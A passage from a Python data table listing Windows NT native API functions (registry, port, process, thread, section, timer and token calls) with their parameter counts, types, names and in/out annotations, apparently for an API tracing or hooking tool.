'NtQueryIoCompletion': (5, ['HANDLE', 'IO_COMPLETION_INFORMATION_CLASS', 'PVOID', 'ULONG', 'PULONG'], ['IoCompletionHandle', 'InformationClass', 'IoCompletionInformation', 'InformationBufferLength', 'RequiredLength'], 'NTSTATUS', ['__IN', '__IN', '__OUT', '__IN', '__OUT_opt']), 'NtRemoveIoCompletion': (5, ['HANDLE', 'PULONG', 'PULONG', 'PIO_STATUS_BLOCK', 'PLARGE_INTEGER'], ['IoCompletionHandle', 'CompletionKey', 'CompletionValue', 'IoStatusBlock', 'Timeout'], 'NTSTATUS', ['__IN', '__OUT', '__OUT', '__OUT', '__IN_opt']), 'NtSetIoCompletion': (5, ['HANDLE', 'ULONG', 'PIO_STATUS_BLOCK', 'NTSTATUS', 'ULONG'], ['IoCompletionHandle', 'CompletionKey', 'IoStatusBlock', 'CompletionStatus', 'NumberOfBytesTransfered'], 'NTSTATUS', ['__IN', '__IN', '__OUT', '__IN', '__IN']), 'NtCompactKeys': (2, ['ULONG', 'HANDLE'], ['NrOfKeys', 'KeysArray[]'], 'NTSTATUS', ['__IN', '__IN']), 'NtCompressKey': (1, ['HANDLE'], ['Key'], 'NTSTATUS', ['__IN']), 'NtCreateKey': (7, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'ULONG', 'PUNICODE_STRING', 'ULONG', 'PULONG'], ['pKeyHandle', 'DesiredAccess', 'ObjectAttributes', 'TitleIndex', 'Class', 'CreateOptions', 'Disposition'], 'NTSTATUS', ['__OUT', '__IN', '__IN', '__IN', '__IN_opt', '__IN', '__OUT_opt']), 'NtDeleteKey': (1, ['HANDLE'], ['KeyHandle'], 'NTSTATUS', ['__IN']), 'NtDeleteValueKey': (2, ['HANDLE', 'PUNICODE_STRING'], ['KeyHandle', 'ValueName'], 'NTSTATUS', ['__IN', '__IN']), 'NtEnumerateKey': (6, ['HANDLE', 'ULONG', 'KEY_INFORMATION_CLASS', 'PVOID', 'ULONG', 'PULONG'], ['KeyHandle', 'Index', 'KeyInformationClass', 'KeyInformation', 'Length', 'ResultLength'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__OUT', '__IN', '__OUT']), 'NtEnumerateValueKey': (6, ['HANDLE', 'ULONG', 'KEY_VALUE_INFORMATION_CLASS', 'PVOID', 'ULONG', 'PULONG'], ['KeyHandle', 'Index', 'KeyValueInformation', 'KeyValueInformation', 'Length', 'ResultLength'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__OUT', '__IN', '__OUT']), 'NtFlushKey': (1, ['HANDLE'], ['KeyHandle'], 'NTSTATUS', ['__IN']), 'NtLoadKey': (2, ['POBJECT_ATTRIBUTES', 'POBJECT_ATTRIBUTES'], ['DestinationKeyName', 'HiveFileName'], 'NTSTATUS', ['__IN', '__IN']), 'NtLoadKey2': (3, ['POBJECT_ATTRIBUTES', 'POBJECT_ATTRIBUTES', 'ULONG'], ['DestinationKeyName', 'HiveFileName', 'Flags'], 'NTSTATUS', ['__IN', '__IN', '__IN']), 'NtNotifyChangeKey': (10, ['HANDLE', 'HANDLE', 'PIO_APC_ROUTINE', 'PVOID', 'PIO_STATUS_BLOCK', 'ULONG', 'BOOLEAN', 'PVOID', 'ULONG', 'BOOLEAN'], ['KeyHandle', 'EventHandle', 'ApcRoutine', 'ApcRoutineContext', 'IoStatusBlock', 'NotifyFilter', 'WatchSubtree', 'RegChangesDataBuffer', 'RegChangesDataBufferLength', 'Asynchronous'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN', '__IN', '__IN', '__IN', '__OUT', '__IN', '__IN']), 'NtOpenKey': (3, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES'], ['pKeyHandle', 'DesiredAccess', 'ObjectAttributes'], 'NTSTATUS', ['__OUT', '__IN', '__IN']), 'NtQueryKey': (5, ['HANDLE', 'KEY_INFORMATION_CLASS', 'PVOID', 'ULONG', 'PULONG'], ['KeyHandle', 'KeyInformationClass', 'KeyInformation', 'Length', 'ResultLength'], 'NTSTATUS', ['__IN', '__IN', '__OUT', '__IN', '__OUT']), 'NtQueryMultipleValueKey': (6, ['HANDLE', 'PKEY_MULTIPLE_VALUE_INFORMATION', 'ULONG', 'PVOID', 'ULONG', 'PULONG'], ['KeyHandle', 'ValuesList', 'NumberOfValues', 'DataBuffer', 'BufferLength', 'RequiredLength'], 'NTSTATUS', ['__IN', '__IN_OUT', '__IN', '__OUT', '__IN_OUT', '__OUT_opt']), 'NtQueryValueKey': (6, ['HANDLE', 'PUNICODE_STRING', 'KEY_VALUE_INFORMATION_CLASS', 'PVOID', 'ULONG', 'PULONG'], ['KeyHandle', 'ValueName', 'KeyValueInformationClass', 'KeyValueInformation', 'Length', 'ResultLength'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__OUT', '__IN', '__OUT']), 'NtReplaceKey': (3, ['POBJECT_ATTRIBUTES', 'HANDLE', 'POBJECT_ATTRIBUTES'], ['NewHiveFileName', 'KeyHandle', 'BackupHiveFileName'], 'NTSTATUS', ['__IN', '__IN', '__IN']), 'NtRestoreKey': (3, ['HANDLE', 'HANDLE', 'ULONG'], ['KeyHandle', 'FileHandle', 'RestoreOption'], 'NTSTATUS', ['__IN', '__IN', '__IN']), 'NtSaveKey': (2, ['HANDLE', 'HANDLE'], ['KeyHandle', 'FileHandle'], 'NTSTATUS', ['__IN', '__IN']), 'NtSetInformationKey': (4, ['HANDLE', 'KEY_SET_INFORMATION_CLASS', 'PVOID', 'ULONG'], ['KeyHandle', 'InformationClass', 'KeyInformationData', 'DataLength'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN']), 'NtSetValueKey': (6, ['HANDLE', 'PUNICODE_STRING', 'ULONG', 'ULONG', 'PVOID', 'ULONG'], ['KeyHandle', 'ValueName', 'TitleIndex', 'Type', 'Data', 'DataSize'], 'NTSTATUS', ['__IN', '__IN', '__IN_opt', '__IN', '__IN', '__IN']), 'NtUnloadKey': (1, ['POBJECT_ATTRIBUTES'], ['DestinationKeyName'], 'NTSTATUS', ['__IN']), 'RtlFormatCurrentUserKeyPath': (1, ['PUNICODE_STRING'], ['RegistryPath'], 'NTSTATUS', ['__OUT']), 'NtCreateKeyedEvent': (4, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'ULONG'], ['KeyedEventHandle', 'DesiredAccess', 'ObjectAttributes', 'Reserved'], 'NTSTATUS', ['__OUT', '__IN', '__IN_opt', '__IN']), 'NtReleaseKeyedEvent': (4, ['HANDLE', 'PVOID', 'BOOLEAN', 'PLARGE_INTEGER'], ['KeyedEventHandle', 'Key', 'Alertable', 'Timeout'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN_opt']), 'NtWaitForKeyedEvent': (4, ['HANDLE', 'PVOID', 'BOOLEAN', 'PLARGE_INTEGER'], ['KeyedEventHandle', 'Key', 'Alertable', 'Timeout'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN_opt']), 'NtCreateMutant': (4, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'BOOLEAN'], ['MutantHandle', 'DesiredAccess', 'ObjectAttributes', 'InitialOwner'], 'NTSTATUS', ['__OUT', '__IN', '__IN_opt', '__IN']), 'NtOpenMutant': (3, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES'], ['MutantHandle', 'DesiredAccess', 'ObjectAttributes'], 'NTSTATUS', ['__OUT', '__IN', '__IN']), 'NtQueryMutant': (5, ['HANDLE', 'MUTANT_INFORMATION_CLASS', 'PVOID', 'ULONG', 'PULONG'], ['MutantHandle', 'MutantInformationClass', 'MutantInformation', 'MutantInformationLength', 'ResultLength'], 'NTSTATUS', ['__IN', '__IN', '__OUT', '__IN', '__OUT_opt']), 'NtReleaseMutant': (2, ['HANDLE', 'PLONG'], ['MutantHandle', 'PreviousCount'], 'NTSTATUS', ['__IN', '__OUT_opt']), 'NtAcceptConnectPort': (6, ['PHANDLE', 'HANDLE', 'PLPC_MESSAGE', 'BOOLEAN', 'PLPC_SECTION_OWNER_MEMORY', 'PLPC_SECTION_MEMORY'], ['ServerPortHandle', 'AlternativeReceivePortHandle', 'ConnectionReply', 'AcceptConnection', 'ServerSharedMemory', 'ClientSharedMemory'], 'NTSTATUS', ['__OUT', '__IN_opt', '__IN', '__IN', '__IN_OUT_opt', '__OUT_opt']), 'NtCompleteConnectPort': (1, ['HANDLE'], ['PortHandle'], 'NTSTATUS', ['__IN']), 'NtConnectPort': (8, ['PHANDLE', 'PUNICODE_STRING', 'PSECURITY_QUALITY_OF_SERVICE', 'PLPC_SECTION_OWNER_MEMORY', 'PLPC_SECTION_MEMORY', 'PULONG', 'PVOID', 'PULONG'], ['ClientPortHandle', 'ServerPortName', 'SecurityQos', 'ClientSharedMemory', 'ServerSharedMemory', 'MaximumMessageLength', 'ConnectionInfo', 'ConnectionInfoLength'], 'NTSTATUS', ['__OUT', '__IN', '__IN', '__IN_OUT_opt', '__OUT_opt', '__OUT_opt', '__IN_opt', '__IN_opt']), 'NtCreatePort': (5, ['PHANDLE', 'POBJECT_ATTRIBUTES', 'ULONG', 'ULONG', 'PULONG'], ['PortHandle', 'ObjectAttributes', 'MaxConnectInfoLength', 'MaxDataLength', 'Reserved'], 'NTSTATUS', ['__OUT', '__IN', '__IN', '__IN', '__IN_OUT_opt']), 'NtImpersonateClientOfPort': (2, ['HANDLE', 'PLPC_MESSAGE'], ['PortHandle', 'Request'], 'NTSTATUS', ['__IN', '__IN']), 'NtListenPort': (2, ['HANDLE', 'PLPC_MESSAGE'], ['PortHandle', 'ConnectionRequest'], 'NTSTATUS', ['__IN', '__OUT']), 'NtQueryInformationPort': (5, ['HANDLE', 'PORT_INFORMATION_CLASS', 'PVOID', 'ULONG', 'PULONG'], ['PortHandle', 'PortInformationClass', 'PortInformation', 'Length', 'ResultLength'], 'NTSTATUS', ['__IN', '__IN', '__OUT', '__IN', '__OUT_opt']), 'NtReadRequestData': (6, ['HANDLE', 'PLPC_MESSAGE', 'ULONG', 'PVOID', 'ULONG', 'PULONG'], ['PortHandle', 'Request', 'DataIndex', 'Buffer', 'Length', 'ResultLength'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__OUT', '__IN', '__OUT_opt']), 'NtReplyPort': (2, ['HANDLE', 'PLPC_MESSAGE'], ['PortHandle', 'Reply'], 'NTSTATUS', ['__IN', '__IN']), 'NtReplyWaitReceivePort': (4, ['HANDLE', 'PHANDLE', 'PLPC_MESSAGE', 'PLPC_MESSAGE'], ['PortHandle', 'ReceivePortHandle', 'Reply', 'IncomingRequest'], 'NTSTATUS', ['__IN', '__OUT_opt', '__IN_opt', '__OUT']), 'NtReplyWaitReplyPort': (2, ['HANDLE', 'PLPC_MESSAGE'], ['PortHandle', 'Reply'], 'NTSTATUS', ['__IN', '__IN_OUT']), 'NtRequestPort': (2, ['HANDLE', 'PLPC_MESSAGE'], ['PortHandle', 'Request'], 'NTSTATUS', ['__IN', '__IN']), 'NtRequestWaitReplyPort': (3, ['HANDLE', 'PLPC_MESSAGE', 'PLPC_MESSAGE'], ['PortHandle', 'Request', 'IncomingReply'], 'NTSTATUS', ['__IN', '__IN', '__OUT']), 'NtWriteRequestData': (6, ['HANDLE', 'PLPC_MESSAGE', 'ULONG', 'PVOID', 'ULONG', 'PULONG'], ['PortHandle', 'Request', 'DataIndex', 'Buffer', 'Length', 'ResultLength'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN', '__IN', '__OUT_opt']), 'NtCreateProcess': (8, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'HANDLE', 'BOOLEAN', 'HANDLE', 'HANDLE', 'HANDLE'], ['ProcessHandle', 'DesiredAccess', 'ObjectAttributes', 'ParentProcess', 'InheritObjectTable', 'SectionHandle', 'DebugPort', 'ExceptionPort'], 'NTSTATUS', ['__OUT', '__IN', '__IN_opt', '__IN', '__IN', '__IN_opt', '__IN_opt', '__IN_opt']), 'NtFlushInstructionCache': (3, ['HANDLE', 'PVOID', 'ULONG'], ['ProcessHandle', 'BaseAddress', 'NumberOfBytesToFlush'], 'NTSTATUS', ['__IN', '__IN', '__IN']), 'NtOpenProcess': (4, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'PCLIENT_ID'], ['ProcessHandle', 'AccessMask', 'ObjectAttributes', 'ClientId'], 'NTSTATUS', ['__OUT', '__IN', '__IN', '__IN']), 'NtQueryInformationProcess': (5, ['HANDLE', 'PROCESS_INFORMATION_CLASS', 'PVOID', 'ULONG', 'PULONG'], ['ProcessHandle', 'ProcessInformationClass', 'ProcessInformation', 'ProcessInformationLength', 'ReturnLength'], 'NTSTATUS', ['__IN', '__IN', '__OUT', '__IN', '__OUT']), 'NtSetInformationProcess': (4, ['HANDLE', 'PROCESS_INFORMATION_CLASS', 'PVOID', 'ULONG'], ['ProcessHandle', 'ProcessInformationClass', 'ProcessInformation', 'ProcessInformationLength'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN']), 'NtTerminateProcess': (2, ['HANDLE', 'NTSTATUS'], ['ProcessHandle', 'ExitStatus'], 'NTSTATUS', ['__IN_opt', '__IN']), 'RtlCreateUserProcess': (10, ['PUNICODE_STRING', 'ULONG', 'PRTL_USER_PROCESS_PARAMETERS', 'PSECURITY_DESCRIPTOR', 'PSECURITY_DESCRIPTOR', 'HANDLE', 'BOOLEAN', 'HANDLE', 'HANDLE', 'PRTL_USER_PROCESS_INFORMATION'], ['ImagePath', 'ObjectAttributes', 'ProcessParameters', 'ProcessSecurityDescriptor', 'ThreadSecurityDescriptor', 'ParentProcess', 'InheritHandles', 'DebugPort', 'ExceptionPort', 'ProcessInformation'], 'NTSTATUS', ['__IN', '__IN', '__IN_OUT', '__IN_opt', '__IN_opt', '__IN', '__IN', '__IN_opt', '__IN_opt', '__OUT']), 'NtCreateProfile': (9, ['PHANDLE', 'HANDLE', 'PVOID', 'ULONG', 'ULONG', 'PVOID', 'ULONG', 'KPROFILE_SOURCE', 'KAFFINITY'], ['ProfileHandle', 'Process', 'ImageBase', 'ImageSize', 'BucketSize', 'Buffer', 'BufferSize', 'ProfileSource', 'Affinity'], 'NTSTATUS', ['__OUT', '__IN_opt', '__IN', '__IN', '__IN', '__IN', '__IN', '__IN', '__IN']), 'NtQueryIntervalProfile': (2, ['KPROFILE_SOURCE', 'PULONG'], ['ProfileSource', 'Interval'], 'NTSTATUS', ['__IN', '__OUT']), 'NtSetIntervalProfile': (2, ['ULONG', 'KPROFILE_SOURCE'], ['Interval', 'Source'], 'NTSTATUS', ['__IN', '__IN']), 'NtStartProfile': (1, ['HANDLE'], ['ProfileHandle'], 'NTSTATUS', ['__IN']), 'NtStopProfile': (1, ['HANDLE'], ['ProfileHandle'], 'NTSTATUS', ['__IN']), 'NtCreateSection': (7, ['PHANDLE', 'ULONG', 'POBJECT_ATTRIBUTES', 'PLARGE_INTEGER', 'ULONG', 'ULONG', 'HANDLE'], ['SectionHandle', 'DesiredAccess', 'ObjectAttributes', 'MaximumSize', 'PageAttributess', 'SectionAttributes', 'FileHandle'], 'NTSTATUS', ['__OUT', '__IN', '__IN_opt', '__IN_opt', '__IN', '__IN', '__IN_opt']), 'NtExtendSection': (2, ['HANDLE', 'PLARGE_INTEGER'], ['SectionHandle', 'NewSectionSize'], 'NTSTATUS', ['__IN', '__IN']), 'NtMapViewOfSection': (10, ['HANDLE', 'HANDLE', 'PVOID', 'ULONG', 'ULONG', 'PLARGE_INTEGER', 'PULONG', 'DWORD', 'ULONG', 'ULONG'], ['SectionHandle', 'ProcessHandle', '*BaseAddress', 'ZeroBits', 'CommitSize', 'SectionOffset', 'ViewSize', 'InheritDisposition', 'AllocationType', 'Protect'], 'NTSTATUS', ['__IN', '__IN', '__IN_OUT_opt', '__IN_opt', '__IN', '__IN_OUT_opt', '__IN_OUT', '__IN', '__IN_opt', '__IN']), 'NtOpenSection': (3, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES'], ['SectionHandle', 'DesiredAccess', 'ObjectAttributes'], 'NTSTATUS', ['__OUT', '__IN', '__IN']), 'NtQuerySection': (5, ['HANDLE', 'SECTION_INFORMATION_CLASS', 'PVOID', 'ULONG', 'PULONG'], ['SectionHandle', 'InformationClass', 'InformationBuffer', 'InformationBufferSize', 'ResultLength'], 'NTSTATUS', ['__IN', '__IN', '__OUT', '__IN', '__OUT_opt']), 'NtUnmapViewOfSection': (2, ['HANDLE', 'PVOID'], ['ProcessHandle', 'BaseAddress'], 'NTSTATUS', ['__IN', '__IN']), 'NtCreateSemaphore': (5, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'ULONG', 'ULONG'], ['SemaphoreHandle', 'DesiredAccess', 'ObjectAttributes', 'InitialCount', 'MaximumCount'], 'NTSTATUS', ['__OUT', '__IN', '__IN_opt', '__IN', '__IN']), 'NtOpenSemaphore': (3, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES'], ['SemaphoreHandle', 'DesiredAccess', 'ObjectAttributes'], 'NTSTATUS', ['__OUT', '__IN', '__IN']), 'NtQuerySemaphore': (5, ['HANDLE', 'SEMAPHORE_INFORMATION_CLASS', 'PVOID', 'ULONG', 'PULONG'], ['SemaphoreHandle', 'SemaphoreInformationClass', 'SemaphoreInformation', 'SemaphoreInformationLength', 'ReturnLength'], 'NTSTATUS', ['__IN', '__IN', '__OUT', '__IN', '__OUT_opt']), 'NtReleaseSemaphore': (3, ['HANDLE', 'ULONG', 'PULONG'], ['SemaphoreHandle', 'ReleaseCount', 'PreviousCount'], 'NTSTATUS', ['__IN', '__IN', '__OUT_opt']), 'NtCreateSymbolicLinkObject': (4, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'PUNICODE_STRING'], ['pHandle', 'DesiredAccess', 'ObjectAttributes', 'DestinationName'], 'NTSTATUS', ['__OUT', '__IN', '__IN', '__IN']), 'NtOpenSymbolicLinkObject': (3, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES'], ['pHandle', 'DesiredAccess', 'ObjectAttributes'], 'NTSTATUS', ['__OUT', '__IN', '__IN']), 'NtQuerySymbolicLinkObject': (3, ['HANDLE', 'PUNICODE_STRING', 'PULONG'], ['SymbolicLinkHandle', 'pLinkName', 'pDataWritten'], 'NTSTATUS', ['__IN', '__OUT', '__OUT_opt']), 'NtAlertResumeThread': (2, ['HANDLE', 'PULONG'], ['ThreadHandle', 'SuspendCount'], 'NTSTATUS', ['__IN', '__OUT']), 'NtContinue': (2, ['PCONTEXT', 'BOOLEAN'], ['ThreadContext', 'RaiseAlert'], 'NTSTATUS', ['__IN', '__IN']), 'NtCreateThread': (8, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'HANDLE', 'PCLIENT_ID', 'PCONTEXT', 'PINITIAL_TEB', 'BOOLEAN'], ['ThreadHandle', 'DesiredAccess', 'ObjectAttributes', 'ProcessHandle', 'ClientId', 'ThreadContext', 'InitialTeb', 'CreateSuspended'], 'NTSTATUS', ['__OUT', '__IN', '__IN_opt', '__IN', '__OUT', '__IN', '__IN', '__IN']), 'NtCurrentTeb': (0, [], [], 'PTEB', []), 'NtDelayExecution': (2, ['BOOLEAN', 'PLARGE_INTEGER'], ['Alertable', 'DelayInterval'], 'NTSTATUS', ['__IN', '__IN']), 'NtImpersonateThread': (3, ['HANDLE', 'HANDLE', 'PSECURITY_QUALITY_OF_SERVICE'], ['ThreadHandle', 'ThreadToImpersonate', 'SecurityQualityOfService'], 'NTSTATUS', ['__IN', '__IN', '__IN']), 'NtOpenThread': (4, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'PCLIENT_ID'], ['ThreadHandle', 'AccessMask', 'ObjectAttributes', 'ClientId'], 'NTSTATUS', ['__OUT', '__IN', '__IN', '__IN']), 'NtQueryInformationThread': (5, ['HANDLE', 'THREAD_INFORMATION_CLASS', 'PVOID', 'ULONG', 'PULONG'], ['ThreadHandle', 'ThreadInformationClass', 'ThreadInformation', 'ThreadInformationLength', 'ReturnLength'], 'NTSTATUS', ['__IN', '__IN', '__OUT', '__IN', '__OUT_opt']), 'NtRegisterThreadTerminatePort': (1, ['HANDLE'], ['PortHandle'], 'NTSTATUS', ['__IN']), 'NtResumeThread': (2, ['HANDLE', 'PULONG'], ['ThreadHandle', 'SuspendCount'], 'NTSTATUS', ['__IN', '__OUT_opt']), 'NtSetInformationThread': (4, ['HANDLE', 'THREAD_INFORMATION_CLASS', 'PVOID', 'ULONG'], ['ThreadHandle', 'ThreadInformationClass', 'ThreadInformation', 'ThreadInformationLength'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN']), 'NtSuspendThread': (2, ['HANDLE', 'PULONG'], ['ThreadHandle', 'PreviousSuspendCount'], 'NTSTATUS', ['__IN', '__OUT_opt']), 'NtTerminateThread': (2, ['HANDLE', 'NTSTATUS'], ['ThreadHandle', 'ExitStatus'], 'NTSTATUS', ['__IN', '__IN']), 'NtYieldExecution': (0, [], [], 'NTSTATUS', []), 'RtlCreateUserThread': (10, ['HANDLE', 'PSECURITY_DESCRIPTOR', 'BOOLEAN', 'ULONG', 'PULONG', 'PULONG', 'PVOID', 'PVOID', 'PHANDLE', 'PCLIENT_ID'], ['ProcessHandle', 'SecurityDescriptor', 'CreateSuspended', 'StackZeroBits', 'StackReserved', 'StackCommit', 'StartAddress', 'StartParameter', 'ThreadHandle', 'ClientID'], 'NTSTATUS', ['__IN', '__IN_opt', '__IN', '__IN', '__IN_OUT', '__IN_OUT', '__IN', '__IN_opt', '__OUT', '__OUT']), 'NtCancelTimer': (2, ['HANDLE', 'PBOOLEAN'], ['TimerHandle', 'CurrentState'], 'NTSTATUS', ['__IN', '__OUT_opt']), 'NtCreateTimer': (4, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'TIMER_TYPE'], ['TimerHandle', 'DesiredAccess', 'ObjectAttributes', 'TimerType'], 'NTSTATUS', ['__OUT', '__IN', '__IN_opt', '__IN']), 'NtOpenTimer': (3, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES'], ['TimerHandle', 'DesiredAccess', 'ObjectAttributes'], 'NTSTATUS', ['__OUT', '__IN', '__IN']), 'NtQueryTimer': (5, ['HANDLE', 'TIMER_INFORMATION_CLASS', 'PVOID', 'ULONG', 'PULONG'], ['TimerHandle', 'TimerInformationClass', 'TimerInformation', 'TimerInformationLength', 'ReturnLength'], 'NTSTATUS', ['__IN', '__IN', '__OUT', '__IN', '__OUT_opt']), 'NtSetTimer': (7, ['HANDLE', 'PLARGE_INTEGER', 'PTIMER_APC_ROUTINE', 'PVOID', 'BOOLEAN', 'LONG', 'PBOOLEAN'], ['TimerHandle', 'DueTime', 'TimerApcRoutine', 'TimerContext', 'ResumeTimer', 'Period', 'PreviousState'], 'NTSTATUS', ['__IN', '__IN', '__IN_opt', '__IN_opt', '__IN', '__IN_opt', '__OUT_opt']), 'NtAdjustGroupsToken': (6, ['HANDLE', 'BOOLEAN', 'PTOKEN_GROUPS', 'ULONG', 'PTOKEN_GROUPS', 'PULONG'], ['TokenHandle', 'ResetToDefault', 'TokenGroups', 'PreviousGroupsLength', 'PreviousGroups', 'RequiredLength'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN', '__OUT_opt', '__OUT_opt']), 'NtAdjustPrivilegesToken': (6, ['HANDLE', 'BOOLEAN', 'PTOKEN_PRIVILEGES', 'ULONG', 'PTOKEN_PRIVILEGES', 'PULONG'], ['TokenHandle', 'DisableAllPrivileges', 'TokenPrivileges', 'PreviousPrivilegesLength', 'PreviousPrivileges', 'RequiredLength'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN', '__OUT_opt', '__OUT_opt']), 'NtCreateToken': (13, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'TOKEN_TYPE', 'PLUID', 'PLARGE_INTEGER', 'PTOKEN_USER', 'PTOKEN_GROUPS', 'PTOKEN_PRIVILEGES', 'PTOKEN_OWNER', 'PTOKEN_PRIMARY_GROUP', 'PTOKEN_DEFAULT_DACL', 'PTOKEN_SOURCE'], ['TokenHandle', 'DesiredAccess', 'ObjectAttributes', 'TokenType', 'AuthenticationId', 'ExpirationTime', 'TokenUser', 'TokenGroups', 'TokenPrivileges', 'TokenOwner', 'TokenPrimaryGroup', 'TokenDefaultDacl', 'TokenSource'], 'NTSTATUS', ['__OUT', '__IN', '__IN', '__IN', '__IN', '__IN', '__IN', '__IN', '__IN', '__IN', '__IN', '__IN', '__IN']), 'NtDuplicateToken': (6, ['HANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'SECURITY_IMPERSONATION_LEVEL', 'TOKEN_TYPE', 'PHANDLE'], ['ExistingToken', 'DesiredAccess', 'ObjectAttributes', 'ImpersonationLevel', 'TokenType', 'NewToken'], 'NTSTATUS', ['__IN', '__IN', '__IN_opt', '__IN', '__IN', '__OUT']), 'NtOpenProcessToken': (3, ['HANDLE', 'ACCESS_MASK', 'PHANDLE'], ['ProcessHandle', 'DesiredAccess', 'TokenHandle'], 'NTSTATUS', ['__IN', '__IN', '__OUT']), 'NtOpenThreadToken': (4, ['HANDLE', 'ACCESS_MASK', 'BOOLEAN', 'PHANDLE'], ['ThreadHandle', 'DesiredAccess', 'OpenAsSelf', 'TokenHandle'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__OUT']), 'NtQueryInformationToken': (5, ['HANDLE', 'TOKEN_INFORMATION_CLASS', 'PVOID', 'ULONG', 'PULONG'], ['TokenHandle', 'TokenInformationClass', 'TokenInformation', 'TokenInformationLength', 'ReturnLength'], 'NTSTATUS', ['__IN', '__IN', '__OUT', '__IN', '__OUT']), 'NtSetInformationToken': (4, ['HANDLE', 'TOKEN_INFORMATION_CLASS', 'PVOID', 'ULONG'], ['TokenHandle', 'TokenInformationClass', 'TokenInformation', 'TokenInformationLength'], 'NTSTATUS', ['__IN', '__IN', '__OUT', '__IN']), 'NtAccessCheckAndAuditAlarm': (11, ['PUNICODE_STRING', 'HANDLE', 'PUNICODE_STRING', 'PUNICODE_STRING', 'PSECURITY_DESCRIPTOR', 'ACCESS_MASK', 'PGENERIC_MAPPING', 'BOOLEAN', 'PULONG', 'PULONG', 'PBOOLEAN'], ['SubsystemName', 'ObjectHandle', 'ObjectTypeName', 'ObjectName', 'SecurityDescriptor', 'DesiredAccess', 'GenericMapping', 'ObjectCreation', 'GrantedAccess', 'AccessStatus', 'GenerateOnClose'], 'NTSTATUS', ['__IN_opt', '__IN_opt', '__IN_opt', '__IN_opt', '__IN', '__IN', '__IN', '__IN', '__OUT', '__OUT', '__OUT']), 'NtCloseObjectAuditAlarm': (3, ['PUNICODE_STRING', 'HANDLE', 'BOOLEAN'], ['SubsystemName', 'ObjectHandle', 'GenerateOnClose'], 'NTSTATUS', ['__IN', '__IN_opt', '__IN']), 'NtDeleteObjectAuditAlarm': (3, ['PUNICODE_STRING', 'HANDLE', 'BOOLEAN'], ['SubsystemName', 'ObjectHandle', 'GenerateOnClose'], 'NTSTATUS', ['__IN', '__IN_opt', '__IN']), 'NtOpenObjectAuditAlarm': (12, ['PUNICODE_STRING', 'PHANDLE', 'PUNICODE_STRING', 'PUNICODE_STRING', 'PSECURITY_DESCRIPTOR', 'HANDLE', 'ACCESS_MASK', 'ACCESS_MASK', 'PPRIVILEGE_SET', 'BOOLEAN', 'BOOLEAN', 'PBOOLEAN'], ['SubsystemName', 'ObjectHandle', 'ObjectTypeName', 'ObjectName', 'SecurityDescriptor', 'ClientToken', 'DesiredAccess', 'GrantedAccess', 'Privileges', 'ObjectCreation', 'AccessGranted', 'GenerateOnClose'], 'NTSTATUS', ['__IN_opt', '__IN_opt', '__IN_opt', '__IN_opt', '__IN_opt', '__IN', '__IN', '__IN', '__IN_opt', '__IN', '__IN', '__OUT_opt']), 'NtPrivilegeObjectAuditAlarm': (6, ['PUNICODE_STRING', 'HANDLE', 'HANDLE', 'ULONG', 'PPRIVILEGE_SET', 'BOOLEAN'], ['SubsystemName', 'ObjectHandle', 'ClientToken', 'DesiredAccess', 'ClientPrivileges', 'AccessGranted'], 'NTSTATUS', ['__IN_opt', '__IN_opt', '__IN', '__IN', '__IN', '__IN']), 'NtPrivilegedServiceAuditAlarm': (5, ['PUNICODE_STRING', 'PUNICODE_STRING', 'HANDLE', 'PPRIVILEGE_SET', 'BOOLEAN'], ['SubsystemName', 'ServiceName', 'ClientToken', 'ClientPrivileges', 'AccessGranted'], 'NTSTATUS', ['__IN_opt', '__IN_opt', '__IN', '__IN', '__IN']), 'NtAccessCheck': (8, ['PSECURITY_DESCRIPTOR', 'HANDLE', 'ACCESS_MASK', 'PGENERIC_MAPPING', 'PPRIVILEGE_SET', 'PULONG', 'PACCESS_MASK', 'PNTSTATUS'], ['SecurityDescriptor', 'ClientToken', 'DesiredAccess', 'GenericMapping', 'RequiredPrivilegesBuffer', 'BufferLength', 'GrantedAccess', 'AccessStatus'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN_opt', '__OUT', '__IN_OUT', '__OUT', '__OUT']), 'NtAllocateLocallyUniqueId': (1, ['PLUID'], ['LocallyUniqueId'], 'NTSTATUS', ['__OUT']), 'NtAllocateUuids': (3, ['PLARGE_INTEGER', 'PULONG', 'PULONG'], ['Time', 'Range', 'Sequence'], 'NTSTATUS', ['__OUT', '__OUT', '__OUT']), 'NtPrivilegeCheck': (3, ['HANDLE', 'PPRIVILEGE_SET', 'PBOOLEAN'], ['TokenHandle', 'RequiredPrivileges', 'Result'], 